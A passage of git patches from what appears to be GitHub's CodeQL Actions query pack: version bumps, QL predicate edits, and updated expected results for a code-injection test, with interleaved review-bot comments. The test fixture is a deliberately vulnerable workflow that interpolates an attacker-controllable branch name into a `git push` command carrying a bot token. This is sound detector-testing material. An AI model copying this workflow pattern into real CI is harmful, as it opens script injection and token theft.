- i in [0 .. count(text.splitAt("\n"))] and
+ i in [0 .. numberOfLines(text)] and
 result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length)
 }
From fcc7efbc5cd73824835b157118b38374e2b5d0bc Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 29 Oct 2024 19:19:06 +0100
Subject: [PATCH 647/707] Bump qlpack versions
---
ql/lib/qlpack.yml | 2 +-
ql/src/qlpack.yml | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 9554a52d9348..29a1796e1826 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@ library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.79
+version: 0.1.80
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index f6fe9791a934..a1caa7027909 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.79
+version: 0.1.80
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 685c9e97ccf05aea3bcd2569adcfde71a18e2989 Mon Sep 17 00:00:00 2001
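Review bot: `numberOfLines` in the first hunk returns the largest zero-based index that `splitAt` yields, which is the line count minus one, so the name promises one more than the predicate delivers; the inclusive ranges `[0 .. numberOfLines(text)]` in `lineLength` and in `partialLineLengthSum` (second hunk) only come out right because of that. Either rename it to `lastLineIndex` or give it the QLDoc its neighbours already have: `/** Gets the zero-based index of the last `\n`-separated line of `text`, i.e. the line count minus one. */`. As written it is the only predicate in the hunk without a QLDoc comment.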
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 29 Oct 2024 21:17:55 +0100
Subject: [PATCH 648/707] Bump qlpack versions
---
ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +----
ql/lib/qlpack.yml | 2 +-
ql/src/qlpack.yml | 2 +-
3 files changed, 3 insertions(+), 6 deletions(-)
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index 574662254144..1589b18efb02 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -11,10 +11,7 @@ int numberOfLines(string text) { result = max(int i | exists(text.splitAt("\n",
 * Gets the length of each line in the StringValue .
 */
 bindingset[text]
-int lineLength(string text, int i) {
- i in [0 .. numberOfLines(text)] and
- result = text.splitAt("\n", i).length() + 1
-}
+int lineLength(string text, int i) { result = text.splitAt("\n", i).length() + 1 }
 /**
 * Gets the sum of the length of the lines up to the given index.
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 29a1796e1826..a33cecb6fe03 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@ library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.80
+version: 0.1.81
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index a1caa7027909..6d1bc8634ba8 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.80
+version: 0.1.81
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From f76d4d67d990d5b32c46bd0878da432eec491c83 Mon Sep 17 00:00:00 2001
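Review bot: The one-line `lineLength` keeps `+ 1` for every segment `splitAt` returns, including the final one, which has no `\n` after it, and the QLDoc above it still reads "Gets the length of each line in the StringValue ." without mentioning that extra character, so the contract is stated nowhere. If counting the last line with a delimiter is intended (presumably for the offset arithmetic in `partialLineLengthSum`), put it in the QLDoc: `/** Gets the length of line `i` of `text` plus one for its `\n` delimiter; the final line is also counted with that extra character. */`. Dropping the `[0 .. numberOfLines(text)]` guard also leaves `i` unbound (only `text` is in the bindingset), which works only if `splitAt` is meant to enumerate the index here, and that reliance deserves a sentence in the same comment. The two qlpack.yml hunks are version bumps and need nothing.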
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 29 Oct 2024 22:31:15 +0100
Subject: [PATCH 649/707] tests: update tests
---
.../.github/workflows/publishResults.yml | 14 ++++++++++++++
.../CWE-094/CodeInjectionCritical.expected | 16 ++++++++--------
.../CWE-094/CodeInjectionMedium.expected | 12 ++++++------
3 files changed, 28 insertions(+), 14 deletions(-)
diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml
index 17d9680d9074..b4c2ecaec700 100644
--- a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml
+++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml
@@ -60,6 +60,20 @@ jobs:
 id: git-commit
 if: steps.search-patch.outputs.result
 run: |
+ set -x
+ # Set initial placeholder name/mail and read it from the patch later
+ git config --global user.email 'foo@bar'
+ git config --global user.name 'Foo Bar'
+
+ git am version_increments.patch
+
+ # Read the author's name+mail from the just applied patch and recommit it with both set as committer
+ botMail=$(git log -1 --pretty=format:'%ae')
+ botName=$(git log -1 --pretty=format:'%an')
+ git config --global user.email "${botMail}"
+ git config --global user.name "${botName}"
+ git commit --amend --no-edit
+
 fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)
 echo "file-list<> $GITHUB_OUTPUT
 echo "$fileList" >> $GITHUB_OUTPUT
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index 5187e875cb73..a862c0901ca7 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
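Review bot: The `set -x` added at the top of this `run:` block traces every later command of the step, and the step body recorded in the updated .expected rows ends with a `git push` whose URL embeds `${BOT_PA_TOKEN}`, so keeping the token out of the job log presumably rests on the runner's secret masking alone. That is acceptable here because this file is a fixture that deliberately reproduces a workflow the CodeInjection queries must flag (`steps.git-commit.outputs.file-list` reaching an expression), but nothing in the hunk says so; a first line such as `# test fixture: intentionally mirrors an unsafe workflow so CodeInjection* flags steps.git-commit.outputs.file-list` would make the intent explicit to the next editor. `botMail` and `botName` are read from the just-applied `version_increments.patch` and written to global git config, but both expansions are quoted, so nothing further is needed there. The `run:` block continues past the end of the hunk.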
@@ -13,8 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | 
@@ -234,10 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit 
[file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -623,8 +623,8 @@ subpaths | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ 
github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index ddfa951241e3..be14d58737ee 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -13,8 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | 
@@ -234,10 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit 
[file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit 